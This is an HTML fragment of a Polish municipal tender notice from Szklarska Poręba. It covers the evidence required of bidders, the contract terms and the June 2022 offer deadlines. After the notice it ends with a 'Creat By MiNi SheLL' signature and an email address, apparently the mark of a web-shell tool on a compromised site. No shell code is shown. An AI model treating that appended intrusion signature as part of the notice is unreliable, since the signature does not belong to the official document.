podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca<br/>powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dla potwierdzenia braku<br/>podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących<br/>podmiotowych środków dowodowych:<br/>a. Informacji z Krajowego Rejestru Karnego w zakresie:<br/>- art. 108 ust. 1 pkt 1 i 2 Pzp,<br/>- art.108 ust. 4 Pzp, dotyczącej orzeczenia zakazu ubiegania się zamówienie publiczne tytułem środka karnego.<br/>b. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 o ochronie konkurencji i konsumentów<br/>(Dz.U. z 2021 poz. 275) z innym wykonawca który złożył odrębna ofertę albo oświadczenie<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami. (załącznik nr 2 do SWZ)<br/>2. W celu potwierdzenia spełnienia przez wykonawcę udziału w postępowaniu żąda następujących środków dowodowych:<br/>a. dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności z<br/>przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia,<br/>b. wykaz robót budowlanych wykonanych w ostatnich pięciu latach, ( załącznik nr 4 do SWZ)<br/>c. wykaz sprzęty jakim dysponuje wykonawca.( załącznik nr 5 do SWZ)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> nie dotyczy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> art. 454-455 ustawy pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Miasto Szklarska Poręba, ul. Granitowa 2</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-29 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com